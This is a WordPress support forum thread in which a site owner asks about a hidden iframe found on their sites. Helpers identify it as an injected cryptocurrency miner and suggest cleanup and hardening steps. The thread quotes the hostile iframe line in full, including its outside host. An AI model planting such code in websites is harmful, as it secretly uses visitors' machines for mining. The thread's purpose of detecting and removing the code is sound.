Support » Fixing WordPress » Found miner?

  • mattish.91

    (@mattish91)


    So, i found this code in all WordPress sites that i have visited since yesterday and would like to know some more on it, im going to look through the code that is included with this, also what file that is including this script on our site, i would also like to know if your website has this script and if you know what it might be, i have looked at the original website of this script and it seams that it indeed is a Monero miner script that is included with WordPress or atleast running on all the setups of WordPress i have ever made… and now i think it looks suspicious that it comes from specifically a Monero miner website…

    Code included with WordPress:
    <iframe style="display: none;" src="https://devappgrant.space/lib/iframe.html?u=51807_5522&t=0.8"></iframe>

    Monero mining website?:
    https://devappgrant.space

    If you got any idea of what this specific script does, please let me know. Im thrilled.

Viewing 6 replies - 1 through 6 (of 6 total)
  • Moderator Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    mattish.91

    (@mattish91)

    Wordfence did not find anything, ill check with sucuri aswell. but this code surely seams odd to me that this even is there… very suspicious…

    te_taipo

    (@te_taipo)

    The malicious code is hosted offsite, so it would be very difficult for any plugin to detect it.

    It is most certainly a malicious <iframe> that loads a javascript cryptocurrency miner into the browser of anyone viewing pages on your website.

    What you need to do is run through the fix it guide above to clean out the <iFrame? code from your website, then you need to work out how an attacker was able to install the malicious <iFrame> into your website (in order to prevent it from happening again)

    mattish.91

    (@mattish91)

    I have been looking trough the files of my installation, and i can’t find anything that is not what it’s supposed to be, i have compared files with a fresh install of WordPress, and the files are not different than what i have modified my self. Im literally clueless about what appeared here, it might be a plugin tho, so ill probably have to check that out as well. Since most of my websites use Yoast, Page Builder and Jetpack i believe it might be one of those plugins causing it, but not sure yet. Still investigating this…

    Do you find that in the bottom of your WordPress installation and do you use any of the following plugins on your site?

    mattish.91

    (@mattish91)

    i have been taking some precautions by changing the admin account username and password, changed the database username and password, changing login page location as well as changing some common WordPress directories by hard coding the locations of themes and files, i have updated my htacess file to match the security it deserves as well as limiting the R/W access to only be used by the apache user. im also doing a full system scan with clam AV to make sure the system is not compromised in any other way. i have checked open ports of my firewall server and it seams everything is closed as much as it could be without interfering with the hosting and the webserver. I also made sure nothing else were compromised with the apache config as well as the php config just to make sure nothing unnecessary is used while not needed.

    • This reply was modified 1 year ago by  mattish.91.
    • This reply was modified 1 year ago by  mattish.91.
    te_taipo

    (@te_taipo)

    Without being able to see your website, I can only take guesses. So with that in mind, the injection of the code could be in the database itself. If you have access to your database, check the posts, and also another favourite place attackers hide their code, in the post meta tags.

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘Found miner?’ is closed to new replies.